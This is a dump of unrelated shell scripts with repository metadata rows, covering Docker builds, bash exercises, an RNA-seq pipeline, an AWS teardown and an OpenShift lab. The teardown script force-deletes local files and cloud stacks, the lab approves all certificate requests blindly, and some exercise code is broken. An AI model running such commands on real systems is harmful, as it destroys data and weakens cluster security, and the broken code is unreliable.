docker build --force-rm --file docker/Dockerfile --target armory -t twosixarmory/armory:${version} .
docker build --force-rm --file docker/${1}/Dockerfile --build-arg armory_version=${version} --target armory-${1}-base -t twosixarmory/${1}-base:${version} .
docker build --force-rm --file docker/${1}-dev/Dockerfile --build-arg armory_version=${version} --target armory-${1}-dev -t twosixarmory/${1}:${version} .
fi
| true |
f8f1fe7a6e50b39a0452cd5328a2d829b8bdd8b1 | Shell | fcnorman/wolf | /data.provider/src/3.schedule.today.sh | UTF-8 | 930 | 3.578125 | 4 | [] | no_license | #!/bin/bash
if [ -z "$WOLF_DATA_PROVIDER_HOME" ]; then
echo variable WOLF_DATA_PROVIDER_HOME undefined
exit 1
fi
if [ -z "$WOLF_HISTDATA_HOME" ]; then
echo variable WOLF_HISTDATA_HOME undefined
exit 1
fi
if [ $# -ne 1 ]
then
echo "usage: $(basename $0) SYMBOL"
exit 1
fi
CAT=/bin/cat
PYTHON=/usr/bin/python
PATH_TO_CSV=$WOLF_HISTDATA_HOME/data/csv
PATH_TO_SRC=$WOLF_DATA_PROVIDER_HOME/src
PATH_TO_LOG=$WOLF_DATA_PROVIDER_HOME/log
CURR_MONTH=$(TZ="EST" date +"%m")
PREV_MONTH=$(TZ="EST" date +"%m" --date="1 month ago")
CURR_DAY=$(TZ="EST" date +"%d")
NEXT_DAY=$(TZ="EST" date +"%d" --date="next day")
CURR_HOUR=$(TZ="EST" date +"%H")
CURR_YEAR=$(TZ="EST" date +"%Y")
SYMBOL=$1
${CAT} ${PATH_TO_CSV}/DAT_ASCII_${SYMBOL}_T_${CURR_YEAR}${PREV_MONTH}.csv | grep ^${CURR_YEAR}${PREV_MONTH}${CURR_DAY} | $PYTHON -u $PATH_TO_SRC/2.provider.py $SYMBOL $CURR_MONTH $CURR_DAY &>> $PATH_TO_LOG/$SYMBOL.log &
| true |
74256fc25f6d5d0e94ca1b3e88ddac4ab291c361 | Shell | samuelcolvin/init-desktop | /mktouch | UTF-8 | 87 | 2.546875 | 3 | [] | no_license | #!/usr/bin/env bash
set -e
FILE_PATH=$1
mkdir -p `dirname $FILE_PATH`
touch $FILE_PATH
| true |
f151fb3b7372781754806274837137665830405c | Shell | jlefebvre94/test-bash | /delta.sh | UTF-8 | 4,815 | 3.71875 | 4 | [] | no_license | #!/bin/bash
ARG1=${1:?"Erreur : vous devez indiquer le nom du fichier a renommer"}
EXTFICHIER=$(echo | cut -d . -f 2-)
CORPSFICHIER=$(echo | cut -d . -f 1)
mv $ARG1 ${CORPSFICHIER}_alice.$EXTFICHIER
******************************************************* #exo1.sh
#!/bin/bash
[ $# -eq 3 -a "$1" != "$2" -a "$1" != "$3" -a "$2" != "$3" -a "$1" \< "$2" -a "$2" \< "$3" ]
********************************************************************************* #exo2.sh
#!/bin/bash
[ -f "$1" -a $# -ge 1 -a ! -w "$1" ]
************************************************************************************ #exo3.sh
#!/bin/bash
[[ $# -ge 1 && $1 == *X* && $1 == *Y* ]]
**************************************** #ouinon.sh
#!/bin/bash
[[ $# -lt 1 ]] && echo "Vous n'avez pas donné votre réponse" && exit 3 \
|| [[ $# -gt 1 ]] && echo "Donnez une seule réponse" && exit 4 \
|| [[ $1 == o || $1 == O ]] && echo "oui" && exit 0 \
|| [[ $1 == n || $1 == N ]] && echo "non" && exit 1 \
|| echo "Pas compris" && exit 5
*****************************************
#!/bin/bash
## fichier : testargu.sh
if [[ $# -eq 2 ]]
then
if [[ ! -f $1 || ! -r $1 || ! -w $1 ]]
then
echo "usage : testargu.sh fichier repertoire [nombre_positif ]"
exit 4
elif [[ ! -d $2 || ! -x $2 ]]
then
echo "usage : testargu.sh fichier repertoire [nombre_positif ]"
exit 5
else
echo "999"
fi
elif [[ $# -eq 3 ]]
then
if [[ ! -f $1 || ! -r $1 || ! -w $1 ]]
then
echo "usage : testargu.sh fichier repertoire [nombre_positif ]"
exit 4
elif [[ ! -d $2 || ! -x $2 ]]
then
echo "usage : testargu.sh fichier repertoire [nombre_positif ]"
exit 5
elif [[ $3 -lt 1 ]]
then
echo "usage : testargu.sh fichier repertoire [nombre_positif ]"
exit 6
else
echo $3
fi
else
echo "usage : testargu.sh fichier repertoire [nombre_positif ]"
exit 3
fi
*******************************************************
##!/bin/bash
## fichier : unetouche.sh
if [[ $# -ne 1 ]]
then
echo "Donner exactement un argument"
exit 90
fi
case $1 in
[a-z])
echo "Minuscule"
exit 10
;;
[A-Z])
echo "Majuscule"
exit 11
;;
[0-9])
echo "Chiffre"
exit 12
;;
?)
echo "Autre"
exit 20
;;
*)
echo "Donner un seul caractère"
exit 91
;;
esac
*******************************************************
#!/bin/bash
## fichier : size.sh
declare -i i=0 #pour numeroter chaque iteration
if [ $# -eq 0 ] ; then # argument manquant
echo " Usage: $0 file" >&2
exit 1
fi
if ! [ -f $1 ] ; then
echo "Erreur: fichier $@ non existant" >&2
exit 1
fi
for field in $(ls -l $1); do
# echo "$i -> $field" #affichage pour trouver la
#position recherchee
if [ $i -eq 4 ] # no de la position de la taille
then # sur la ligne
echo $field # taille du fichier
break
fi
i=$((i+1))
done
exit 0
######################################
*****************************************************
#!/bin/bash
## fichier : size_movie_mkv.sh
declare -i total=0 #taille total
for fichier in $(ls /home/alice/Movies/*.mkv)
do
taille=$((taille+$(size.sh $fichier)))
done
echo $taille
##################################
****************************************************
#!/bin/bash
## fichier : format_size.sh ###
# taille en octets à formater
taille=${1:?"Erreur: il manque la taille en argument"}
# constantes
KIO=1024 # 1 Kio
MIO=$((1024*$KIO)) # 1 Mio
GIO=$((1024*$MIO)) # 1 Gio
# calcul du nombre W de Gio
W=0
while [ $taille -ge $GIO ] ; do
W=$(($W + 1)) # 1 Gio de plus
taille=$(($taille - $GIO)) #taille restante moins 1 Gio
done
X=0
while [ $taille -ge $MIO ] ; do
X=$(($X + 1)) # 1 Gio de plus
taille=$(($taille - $MIO)) #taille restante moins 1 Mio
done
Y=0
while [ $taille -ge $KIO ] ; do
Y=$(($Y + 1)) # 1 Gio de plus
taille=$(($taille - $KIO)) #taille restante moins 1 Kio
done
Z=$taille
echo "$W Gio $X Mio $Y Kio $Z octets"
***********************************************************
#!/bin/bash
## fichier : ploumploum.sh ###
alea() {
nb=$(($RANDOM % ($1 +1)))
return $nb
}
selecteur() {
NUM=1
for V in $($@ + 1) ; do
if [[ $NUM -eq $1
echo "argument $NUM = $V"
fi
NUM=$(( $NUM + 1 ))
done
alea $# ; selecteur $? $@
} | true |
50d59fcc5b7324ed193315c12e53c2eab54243bb | Shell | shakerin007/rtg_development | /Others/html X/scripts/do_agent | UTF-8 | 2,557 | 3.25 | 3 | [] | no_license | #!/bin/bash
#--------------------------------------- How to use it ------------------------------------------------------#
# this script will create an agent and lower classes(monitor,driver,sequencer etc.) based on given arguments
# this script is written only for using from other scripts
# it should not be used from terminal
#------------------------------------------------------------------------------------------------------------#
env_file=${1:-default_env.sv};
agent_file=${2:-default_agent.sv};
agent_class=${3:-default_agent};
agent_ins=${4:-default_agent_ins};
driver_file=${5:-driver.sv}
driver_class=${6:-default_driver}
driver_ins=${7:-driver}
monitor_file=${8:-monitor.sv}
monitor_class=${9:-default_monitor};
shift;
monitor_ins=${9:-monitor};
shift;
agent_port=${9:-a_port};
shift;
mon_port=${9:-mon_port};
shift;
sequencer_file=${9:-sequencer.sv}
shift;
sequencer_class=${9:-default_sequencer};
shift;
sequencer_ins=${9:-sequencer};
shift;
sequence_file=${9:-sequence.sv}
shift;
sequence_class=${9:-default_sequence};
shift;
sequence_ins=${9:-sequence_ins};
shift;
sequence_item_file=${9:-sequence_item.sv}
shift;
sequence_item_class=${9:-trans}
shift;
sequence_item_ins=${9:-trans_ins}
shift;
virtual_sequencer_file=${9:-default_vsequencer.sv};
shift;
virtual_sequencer_class=${9:-default_vsequencer};
shift;
virtual_sequence_file=${9:-default_vsequence.sv};
shift;
virtual_sequence_class=${9:-default_vsequence};
shift
mon_active=${9:-PASSIVE};
shift;
active=${9:-ACTIVE};
shift;
destination=${9:-mydir};
../scripts/create_agent $agent_class $agent_ins $active $env_file $destination> $destination/$agent_file
../scripts/create_agent_port $agent_file $agent_port $sequence_item_class $destination
../scripts/create_driver $driver_class $driver_ins $sequence_item_class $sequence_item_ins $active $agent_file $destination> $destination/$driver_file
../scripts/do_monitor $monitor_class $monitor_ins $sequence_item_class $sequence_item_ins $agent_port $mon_port $mon_active $agent_file $monitor_file $destination
../scripts/do_sequencer $sequencer_class $sequencer_ins $virtual_sequencer_file $virtual_sequencer_class $driver_ins $agent_file $agent_class $agent_ins $active $sequencer_file $env_file $destination
../scripts/create_sequence $sequence_class $sequence_ins $sequencer_class $sequencer_ins $sequence_item_class $sequence_item_ins $virtual_sequence_file $destination> $destination/$sequence_file
../scripts/create_seq_item $sequence_item_class > $destination/$sequence_item_file
| true |
d1a5f86364d9cc6add01c7078615adb2ab9f903c | Shell | mandeeps708/scripts | /screenshot/screenshot3.sh | UTF-8 | 389 | 2.84375 | 3 | [
"MIT"
] | permissive | #!/bin/sh
#This script takes the screenshot of area selected by two mouse clicks and
#saves it in a folder say ~/Desktop/screenshots. This location can be modified
#by changing the path variable below. Add shortcut to this script in the
#System Settings> Keyboard shortcuts.
path=~/Desktop/screenshots
mkdir -p $path
gnome-screenshot --file=$path/Myscreenshot`date +%I.%M.%S`.png -B -a
| true |
2958fbbd1b87dfa5e586f2abef05db6488635346 | Shell | humbertodosreis/DoCaaS | /demos/reset-presentation.sh | UTF-8 | 2,170 | 3.203125 | 3 | [] | no_license | #!/bin/bash
. ./loadvariables.sh
# Get User Pool ID
cd ..
A=`grep "IdentityPoolId" multi-tenant-app/amplify/backend/amplify-meta.json`
IDENTITYPOOLID=`echo "{ $A \"t\":1 }" | jq ".IdentityPoolId" --raw-output`
echo "The Identity Pool Id is: $IDENTITYPOOLID"
sleep 5
# manually discard all changes in local repo (deletes all new local files and changes)
git reset --hard HEAD
git clean --force
rm -fr multi-tenant-app
git pull && cd demos
# Get RoleNameAuth
INPUT=`aws cognito-identity get-identity-pool-roles --identity-pool-id $IDENTITYPOOLID --query "Roles.authenticated" --output text`
ROLENAMEAUTH=${INPUT#*/} # remove prefix ending in "/"
echo $ROLENAMEAUTH
# Attach 2 policies to Authenticated Role
AWSACCOUNT=`aws sts get-caller-identity --output text --query 'Account'`
echo "The AWS Account is: $AWSACCOUNT"
aws iam detach-role-policy --role-name $ROLENAMEAUTH --policy-arn arn:aws:iam::$AWSACCOUNT:policy/DoCaaSDynamoPolicyForAuthenticated
aws iam detach-role-policy --role-name $ROLENAMEAUTH --policy-arn arn:aws:iam::$AWSACCOUNT:policy/DoCaaSDefaultPolicyForAuthenticated
# delete Amplify Stack
A=`aws cloudformation list-stacks --stack-status-filter UPDATE_COMPLETE | grep '"StackName": "multitenantapp'`
echo $A
STACKNAME=`echo "{ $A \"t\":1 }" | jq ".StackName" --raw-output`
echo "Amplify's Stack Name to delete is: $STACKNAME"
aws cloudformation delete-stack --stack-name $STACKNAME
# Delete docaas SAM stack
aws cloudformation delete-stack --stack-name docaas
# Delete docaas-dynamos stack
aws cloudformation delete-stack --stack-name docaas-dynamos
# Confirm cfn deleted with Amplify STACK!!
aws cloudformation wait stack-delete-complete --stack-name docaas-dynamos
aws cloudformation wait stack-delete-complete --stack-name docaas
aws cloudformation wait stack-delete-complete --stack-name $STACKNAME
# delete IAM policies DefaultPolicyForAuthenticatedUsers and DynamoPolicyForAuthenticatedUsers
aws iam delete-policy --policy-arn arn:aws:iam::$AWSACCOUNT:policy/DoCaaSDynamoPolicyForAuthenticated
aws iam delete-policy --policy-arn arn:aws:iam::$AWSACCOUNT:policy/DoCaaSDefaultPolicyForAuthenticated
echo "Everything's been reset"
| true |
a123a8569f28f53ad368d278cb3534d2631dff19 | Shell | sergiogl68/Genomics_Project | /Genomics_Project.sh | UTF-8 | 2,533 | 2.859375 | 3 | [] | no_license |
#Check the quality of the data using FASTQC--------------------------------------------------------------
conda activate #All tools were installed under miniconda 3 in the base environment
fastqc SRR576933.fastq #control
fastqc SRR576938.fastq #Experimental condition
#Mapping-------------------------------------------------------------------------------------------------
bowtie-build EC_K12.fna E_coli_K12 #Building the genome index file to perform the mapping later
#Mapping the ChIp readings with the reference genome using the genome index file previously built
bowtie E_coli_K12 -q SRR576933.fastq -v 2 -m 1 -3 1 -S 2> SRR576933.out > SRR576933.sam
bowtie E_coli_K12 -q SRR576938.fastq -v 2 -m 1 -3 1 -S 2> SRR576938.out > SRR576938.sam
#Verify Two ENCODE quality metrics-----------------------------------------------------------------------
#For the experiment
samtools view -bS SRR576933.sam > SRR576933.bam
samtools view -F 0x0204 -o - SRR576933.bam | awk 'BEGIN{OFS="\t"}{if (and($2,16) > 0) {print $3,($4-1),($4-1+length($10)),"N","1000","-"} else {print $3,($4-1),($4-1+length($10)),"N","1000","+"} }' | gzip -c > SRR576933_experiment.tagAlign.gz
Rscript ./run_spp.R -c=SRR576933_experiment.tagAlign.gz -savp -out=SRR576933_experiment_phantompeaks
#for the control
samtools view -bS SRR576938.sam > SRR576938.bam
samtools view -F 0x0204 -o - SRR576938.bam | awk 'BEGIN{OFS="\t"}{if (and($2,16) > 0) {print $3,($4-1),($4-1+length($10)),"N","1000","-"} else {print $3,($4-1),($4-1+length($10)),"N","1000","+"} }' | gzip -c > SRR576938_experiment.tagAlign.gz
Rscript ./run_spp.R -c=SRR576938_experiment.tagAlign.gz -savp -out=SRR576938_experiment_phantompeaks
#Peak calling using MACS2-------------------------------------------------------------------------------
macs2 callpeak -t SRR576933.sam -c SRR576938.sam --format SAM --gsize 4641652 --name "macs2" --bw 400 --keep-dup 2 --bdg --nomodel --extsize 200 &> MACS.out
#Motif analysis-----------------------------------------------------------------------------------------
# bedtools getfasta -fi EC_K12.fna -bed macs2_summits.bed -fo macs2_peaks.fa #from the peaks only
bedtools getfasta -fi EC_K12.fna -bed macs2_peaks.narrowPeak -fo macs2_NarrowPeaks.fa #from the bed+4 file
perl -lane '$start=$F[1]-100 ; $end = $F[2]+100 ; print "$F[0]\t$start\t$end"' macs2_summits.bed > macs2_summits+-100.bed #from the summits +-100 bp
bedtools getfasta -fi EC_K12.fna -bed macs2_summits+-100.bed -fo macs2_summits+-100.fa
| true |
cd678ea867ceea00633239daf9811a10a698284a | Shell | LieberInstitute/RNAseq-pipeline | /sh/step3-hisat2.sh | UTF-8 | 7,949 | 3.34375 | 3 | [] | no_license | #!/bin/bash
## Usage information:
# bash step3-hisat2.sh --help
# Define variables
TEMP=$(getopt -o x:p:i:b:l:s:u:h --long experiment:,prefix:,index:,bed:,large:,stranded:,unaligned:,help -n 'step3-hisat2' -- "$@")
eval set -- "$TEMP"
LARGE="FALSE"
STRANDED="FALSE"
UNALIGNED="FALSE"
while true; do
case "$1" in
-x|--experiment)
case "$2" in
"") shift 2 ;;
*) EXPERIMENT=$2 ; shift 2;;
esac;;
-p|--prefix)
case "$2" in
"") shift 2 ;;
*) PREFIX=$2 ; shift 2;;
esac;;
-i|--index)
case "$2" in
"") shift 2 ;;
*) HISATIDX=$2 ; shift 2;;
esac;;
-b|--bed)
case "$2" in
"") shift 2 ;;
*) BED=$2 ; shift 2;;
esac;;
-l|--large)
case "$2" in
"") LARGE="FALSE" ; shift 2;;
*) LARGE=$2; shift 2;;
esac ;;
-s|--stranded)
case "$2" in
"") STRANDED="FALSE" ; shift 2;;
*) STRANDED=$2; shift 2;;
esac ;;
-u|--unaligned)
case "$2" in
"") UNALIGNED="FALSE" ; shift 2;;
*) UNALIGNED=$2; shift 2;;
esac ;;
-h|--help)
echo -e "Usage:\nShort options:\n bash step3-hisat2.sh -x -p -i -b -l (default:FALSE) -s (default:FALSE) -u (default:FALSE)\nLong options:\n bash step3-hisat2.sh --experiment --prefix --index --bed --large (default:FALSE) --stranded (default:FALSE) --unaligned (default:FALSE)"; exit 0; shift ;;
--) shift; break ;;
*) echo "Incorrect options!"; exit 1;;
esac
done
SOFTWARE=/dcl01/lieber/ajaffe/Emily/RNAseq-pipeline/Software
MAINDIR=${PWD}
SHORT="hisat2-${EXPERIMENT}"
sname="step3-${SHORT}.${PREFIX}"
CORES=8
if [[ $LARGE == "TRUE" ]]
then
MEM="mem_free=12G,h_vmem=14G,h_fsize=200G"
else
MEM="mem_free=5G,h_vmem=6G,h_fsize=200G"
fi
if [ -f ".send_emails" ]
then
EMAIL="e"
else
EMAIL="a"
fi
if [ -f ".queue" ]
then
SGEQUEUE="$(cat .queue),"
else
SGEQUEUE=""
fi
if [ -f ".paired_end" ]
then
PE="TRUE"
if [ ${STRANDED} == "FALSE" ]
then
STRANDOPTION=""
elif [ ${STRANDED} == "forward" ]
then
STRANDOPTION="--rna-strandness FR"
elif [ ${STRANDED} == "reverse" ]
then
STRANDOPTION="--rna-strandness RF"
else
echo "The option --stranded has to either be 'FALSE', 'forward' or 'reverse'."
exit 1
fi
else
PE="FALSE"
if [ ${STRANDED} == "FALSE" ]
then
STRANDOPTION=""
elif [ ${STRANDED} == "forward" ]
then
STRANDOPTION="--rna-strandness F"
elif [ ${STRANDED} == "reverse" ]
then
STRANDOPTION="--rna-strandness R"
else
echo "The option --stranded has to either be 'FALSE', 'forward' or 'reverse'."
exit 1
fi
fi
if [ ${UNALIGNED} == "FALSE" ]
then
UNALIGNEDOPT=""
elif [ ${UNALIGNED} == "TRUE" ]
then
mkdir -p ${MAINDIR}/HISAT2_out/unaligned
UNALIGNEDOPT="--un-conc ${MAINDIR}/HISAT2_out/unaligned/\${ID}.fastq"
else
echo "The option --unaligned has to either be 'FALSE' or 'TRUE'"
exit 1
fi
# Construct shell files
FILELIST=${MAINDIR}/samples.manifest
NUM=$(cat $FILELIST | awk '{print $NF}' | uniq | wc -l)
echo "Creating script ${sname}"
cat > ${MAINDIR}/.${sname}.sh <<EOF
#!/bin/bash
#$ -cwd
#$ -l ${SGEQUEUE}${MEM}
#$ -N ${sname}
#$ -pe local ${CORES}
#$ -o ./logs/${SHORT}.\$TASK_ID.txt
#$ -e ./logs/${SHORT}.\$TASK_ID.txt
#$ -t 1-${NUM}
#$ -tc 15
#$ -hold_jid pipeline_setup,step2-trim-${EXPERIMENT}.${PREFIX}
#$ -m ${EMAIL}
echo "**** Job starts ****"
date
echo "**** JHPCE info ****"
echo "User: \${USER}"
echo "Job id: \${JOB_ID}"
echo "Job name: \${JOB_NAME}"
echo "Hostname: \${HOSTNAME}"
echo "Task id: \${SGE_TASK_ID}"
echo "****"
echo "Sample id: \$(cat ${MAINDIR}/samples.manifest | awk '{print \$NF}' | awk "NR==\${SGE_TASK_ID}")"
echo "****"
# Directories
mkdir -p ${MAINDIR}/HISAT2_out/align_summaries
mkdir -p ${MAINDIR}/HISAT2_out/infer_strandness
if [ ${UNALIGNED} == "TRUE" ]
then
mkdir -p ${MAINDIR}/HISAT2_out/unaligned
fi
## Locate file and ids
FILE1=\$(awk 'BEGIN {FS="\t"} {print \$1}' ${FILELIST} | awk "NR==\${SGE_TASK_ID}")
if [ $PE == "TRUE" ]
then
FILE2=\$(awk 'BEGIN {FS="\t"} {print \$3}' ${FILELIST} | awk "NR==\${SGE_TASK_ID}")
fi
ID=\$(cat ${FILELIST} | awk '{print \$NF}' | awk "NR==\${SGE_TASK_ID}")
if [ -f ${MAINDIR}/trimmed_fq/\${ID}_trimmed_forward_paired.fastq ] ; then
## Trimmed, paired-end
echo "HISAT2 alignment run on trimmed paired-end reads"
FP=${MAINDIR}/trimmed_fq/\${ID}_trimmed_forward_paired.fastq
FU=${MAINDIR}/trimmed_fq/\${ID}_trimmed_forward_unpaired.fastq
RP=${MAINDIR}/trimmed_fq/\${ID}_trimmed_reverse_paired.fastq
RU=${MAINDIR}/trimmed_fq/\${ID}_trimmed_reverse_unpaired.fastq
${SOFTWARE}/hisat2-2.0.4/hisat2 -p ${CORES} \
-x $HISATIDX -1 \$FP -2 \$RP -U \${FU},\${RU} \
-S ${MAINDIR}/HISAT2_out/\${ID}_hisat_out.sam ${STRANDOPTION} --phred33 \
${UNALIGNEDOPT} \
2>${MAINDIR}/HISAT2_out/align_summaries/\${ID}_summary.txt
elif [ -f ${MAINDIR}/trimmed_fq/\${ID}_trimmed.fastq ] ; then
## Trimmed, single-end
echo "HISAT2 alignment run on trimmed single-end reads"
${SOFTWARE}/hisat2-2.0.4/hisat2 -p ${CORES} \
-x $HISATIDX -U ${MAINDIR}/trimmed_fq/\${ID}_trimmed.fastq \
-S ${MAINDIR}/HISAT2_out/\${ID}_hisat_out.sam ${STRANDOPTION} --phred33 \
2>${MAINDIR}/HISAT2_out/align_summaries/\${ID}_summary.txt
elif [ $PE == "TRUE" ] ; then
## Untrimmed, pair-end
echo "HISAT2 alignment run on original untrimmed paired-end reads"
${SOFTWARE}/hisat2-2.0.4/hisat2 -p ${CORES} \
-x $HISATIDX -1 \${FILE1} -2 \${FILE2} \
-S ${MAINDIR}/HISAT2_out/\${ID}_hisat_out.sam ${STRANDOPTION} --phred33 \
${UNALIGNEDOPT} \
2>${MAINDIR}/HISAT2_out/align_summaries/\${ID}_summary.txt
else
## Untrimmed, single-end
echo "HISAT2 alignment run on original untrimmed single-end reads"
${SOFTWARE}/hisat2-2.0.4/hisat2 -p ${CORES} \
-x $HISATIDX -U \${FILE1} \
-S ${MAINDIR}/HISAT2_out/\${ID}_hisat_out.sam ${STRANDOPTION} --phred33 \
2>${MAINDIR}/HISAT2_out/align_summaries/\${ID}_summary.txt
fi
###sam to bam
SAM=${MAINDIR}/HISAT2_out/\${ID}_hisat_out.sam
ORIGINALBAM=${MAINDIR}/HISAT2_out/\${ID}_accepted_hits.bam
SORTEDBAM=${MAINDIR}/HISAT2_out/\${ID}_accepted_hits.sorted
#filter unmapped segments
echo "**** Filtering unmapped segments ****"
date
${SOFTWARE}/samtools-1.2/samtools view -bh -F 4 \${SAM} > \${ORIGINALBAM}
${SOFTWARE}/samtools-1.2/samtools sort -@ ${CORES} \${ORIGINALBAM} \${SORTEDBAM}
${SOFTWARE}/samtools-1.2/samtools index \${SORTEDBAM}.bam
## Clean up
rm \${SAM}
rm \${ORIGINALBAM}
## Run infer experiment
echo "**** Inferring strandedness with infer_experiment.py ****"
date
module load python/2.7.9
~/.local/bin/infer_experiment.py -i \${SORTEDBAM}.bam -r ${BED} 1> ${MAINDIR}/HISAT2_out/infer_strandness/\${ID}.txt 2>&1
echo "**** Job ends ****"
date
EOF
call="qsub .${sname}.sh"
echo $call
$call
## Process the output from infer_experiment.py for all samples
SHORT="infer-strandness-${EXPERIMENT}"
sname="step3b-${SHORT}.${PREFIX}"
echo "Creating script ${sname}"
cat > ${MAINDIR}/.${sname}.sh <<EOF
#!/bin/bash
#$ -cwd
#$ -N ${sname}
#$ -o ./logs/${SHORT}.txt
#$ -e ./logs/${SHORT}.txt
#$ -hold_jid pipeline_setup,step3-hisat2-${EXPERIMENT}.${PREFIX}
#$ -m ${EMAIL}
echo "**** Job starts ****"
date
echo "**** JHPCE info ****"
echo "User: \${USER}"
echo "Job id: \${JOB_ID}"
echo "Job name: \${JOB_NAME}"
echo "Hostname: \${HOSTNAME}"
echo "****"
## Process the infer experiment info
Rscript /dcl01/lieber/ajaffe/Emily/RNAseq-pipeline/sh/step3b_infer_strandness.R -o "HISAT2_out/infer_strandness" -p "inferred_strandness_pattern.txt"
echo "**** Job ends ****"
date
EOF
call="qsub .${sname}.sh"
echo $call
$call
| true |
ff7300f430f351f5ddae335dbcc3a6fa9b4774d2 | Shell | shimijun/think2020-cp4a-master-class | /scripts/part1.sh | UTF-8 | 7,099 | 2.515625 | 3 | [
"Apache-2.0"
] | permissive |
# New code block, line: 155
oc get csr -o name | xargs oc adm certificate approve
# End code block, line: 157
# New code block, line: 161
oc delete ClusterServiceVersion elasticsearch-operator.4.3.5-202003020549 \
--ignore-not-found=true \
-n openshift-operators
# End code block, line: 165
oc create namespace istio-system
# New code block, line: 196
appsody repo list
# End code block, line: 198
# New code block, line: 211
appsody repo add kabanero https://github.com/kabanero-io/kabanero-stack-hub/releases/download/0.7.0/kabanero-stack-hub-index.yaml
appsody list kabanero
# End code block, line: 215
# New code block, line: 230
rm -rf /tmp/nodejs-app
mkdir -p /tmp/nodejs-app
cd /tmp/nodejs-app
appsody init kabanero/nodejs-express
appsody run &
# End code block, line: 237
# New code block, line: 241
sleep 30
curl localhost:3000
# End code block, line: 243
# New code block, line: 253
cd /tmp/nodejs-app
appsody stop
# End code block, line: 256
rm -rf /home/ibmdemo/cp4a-labs/think20
# New code block, line: 279
mkdir -p /home/ibmdemo/cp4a-labs/think20
cd /home/ibmdemo/cp4a-labs/think20
git clone https://github.com/think-2020-cp4a/service-a.git
cd service-a
git checkout v1
cd /home/ibmdemo/cp4a-labs/think20
git clone https://github.com/think-2020-cp4a/service-b.git
cd service-b
git checkout v1
cd /home/ibmdemo/cp4a-labs/think20
git clone https://github.com/think-2020-cp4a/service-c.git
cd service-c
git checkout v1
# End code block, line: 296
# New code block, line: 303
oc new-project cloudlab
# End code block, line: 305
# New code block, line: 318
cat<<EOF | oc apply -n cloudlab -f -
apiVersion: v1
kind: ConfigMap
metadata:
name: jaeger-config
data:
JAEGER_ENDPOINT: http://jaeger-collector.istio-system.svc.cluster.local:14268/api/traces
JAEGER_PROPAGATION: b3
JAEGER_REPORTER_LOG_SPANS: "true"
JAEGER_SAMPLER_PARAM: "1"
JAEGER_SAMPLER_TYPE: const
EOF
# End code block, line: 331
# New code block, line: 348
oc patch configs.imageregistry.operator.openshift.io/cluster \
--patch '{"spec":{"defaultRoute":true}}' \
--type=merge
HOST=$(oc get route default-route -n openshift-image-registry --template='{{ .spec.host }}')
docker login -u $(oc whoami) -p $(oc whoami -t) $HOST
# End code block, line: 356
# New code block, line: 363
HOST=$(oc get route default-route -n openshift-image-registry --template='{{ .spec.host }}')
cd /home/ibmdemo/cp4a-labs/think20/service-a
# this may take a few minutes
appsody build \
--pull-url image-registry.openshift-image-registry.svc:5000 \
--push-url $HOST/cloudlab \
--tag service-a:1.0.0
# End code block, line: 373
# New code block, line: 385
HOST=$(oc get route default-route -n openshift-image-registry --template='{{ .spec.host }}')
cd /home/ibmdemo/cp4a-labs/think20/service-b
# this may take a few minutes
appsody build \
--pull-url image-registry.openshift-image-registry.svc:5000 \
--push-url $HOST/cloudlab \
--tag service-b:1.0.0
# End code block, line: 395
# New code block, line: 399
HOST=$(oc get route default-route -n openshift-image-registry --template='{{ .spec.host }}')
cd /home/ibmdemo/cp4a-labs/think20/service-c
# this may take a few minutes
appsody build \
--pull-url image-registry.openshift-image-registry.svc:5000 \
--push-url $HOST/cloudlab \
--tag service-c:1.0.0
# End code block, line: 409
# New code block, line: 413
docker images default-route-openshift-image-registry.apps.demo.ibmdte.net/cloudlab/*
# End code block, line: 415
# New code block, line: 455
cd /home/ibmdemo/cp4a-labs/think20/service-a
appsody deploy \
--no-build \
--namespace cloudlab
# End code block, line: 461
# New code block, line: 472
cd /home/ibmdemo/cp4a-labs/think20/service-b
appsody deploy \
--no-build \
--namespace cloudlab
# End code block, line: 478
# New code block, line: 482
cd /home/ibmdemo/cp4a-labs/think20/service-c
appsody deploy \
--no-build \
--namespace cloudlab
# End code block, line: 488
# New code block, line: 501
oc get AppsodyApplication -n cloudlab -w
# End code block, line: 503
# New code block, line: 530
oc get route -n cloudlab
# End code block, line: 532
# New code block, line: 545
curl service-a-cloudlab.apps.demo.ibmdte.net/node-jee
curl service-a-cloudlab.apps.demo.ibmdte.net/node-springboot
# End code block, line: 548
# New code block, line: 559
cd /home/ibmdemo/cp4a-labs/think20/service-a
appsody deploy delete --namespace cloudlab
cd /home/ibmdemo/cp4a-labs/think20/service-b
appsody deploy delete --namespace cloudlab
cd /home/ibmdemo/cp4a-labs/think20/service-c
appsody deploy delete --namespace cloudlab
# End code block, line: 568
# New code block, line: 590
oc new-app \
--docker-image=image-registry.openshift-image-registry.svc:5000/cloudlab/service-a:1.0.0 \
--name=service-a \
--namespace cloudlab \
--insecure-registry=true
oc new-app \
--docker-image=image-registry.openshift-image-registry.svc:5000/cloudlab/service-b:1.0.0 \
--name=service-b \
--namespace cloudlab \
--insecure-registry=true
oc new-app \
--docker-image=image-registry.openshift-image-registry.svc:5000/cloudlab/service-c:1.0.0 \
--name=service-c \
--namespace cloudlab \
--insecure-registry=true
# End code block, line: 608
# New code block, line: 612
oc expose svc/service-a -n cloudlab
# End code block, line: 614
# New code block, line: 618
curl service-a-cloudlab.apps.demo.ibmdte.net/node-jee
curl service-a-cloudlab.apps.demo.ibmdte.net/node-springboot
# End code block, line: 621
# New code block, line: 679
oc get route -n tekton-pipelines tekton-dashboard
# End code block, line: 681
# New code block, line: 766
oc get dc -n cloudlab -o name | xargs oc delete -n cloudlab
oc get svc -n cloudlab -o name | xargs oc delete -n cloudlab
oc get route -n cloudlab -o name | xargs oc delete -n cloudlab
oc get imagestream -n cloudlab -o name | xargs oc delete -n cloudlab
# End code block, line: 771
# New code block, line: 777
cd /home/ibmdemo/cp4a-labs/think20/service-a/tekton
oc delete -n kabanero --ignore-not-found=true -f service-a-manual-pipeline-run-v1.yaml
oc apply -n kabanero -f service-a-manual-pipeline-run-v1.yaml
# End code block, line: 783
# New code block, line: 787
cd /home/ibmdemo/cp4a-labs/think20/service-b/tekton
oc delete -n kabanero --ignore-not-found=true -f service-b-manual-pipeline-run-v1.yaml
oc apply -n kabanero -f service-b-manual-pipeline-run-v1.yaml
# End code block, line: 793
# New code block, line: 797
cd /home/ibmdemo/cp4a-labs/think20/service-c/tekton
oc delete -n kabanero --ignore-not-found=true -f service-c-manual-pipeline-run-v1.yaml
oc apply -n kabanero -f service-c-manual-pipeline-run-v1.yaml
# End code block, line: 803
# New code block, line: 812
tkn pipelinerun list -n kabanero
# End code block, line: 814
# New code block, line: 827
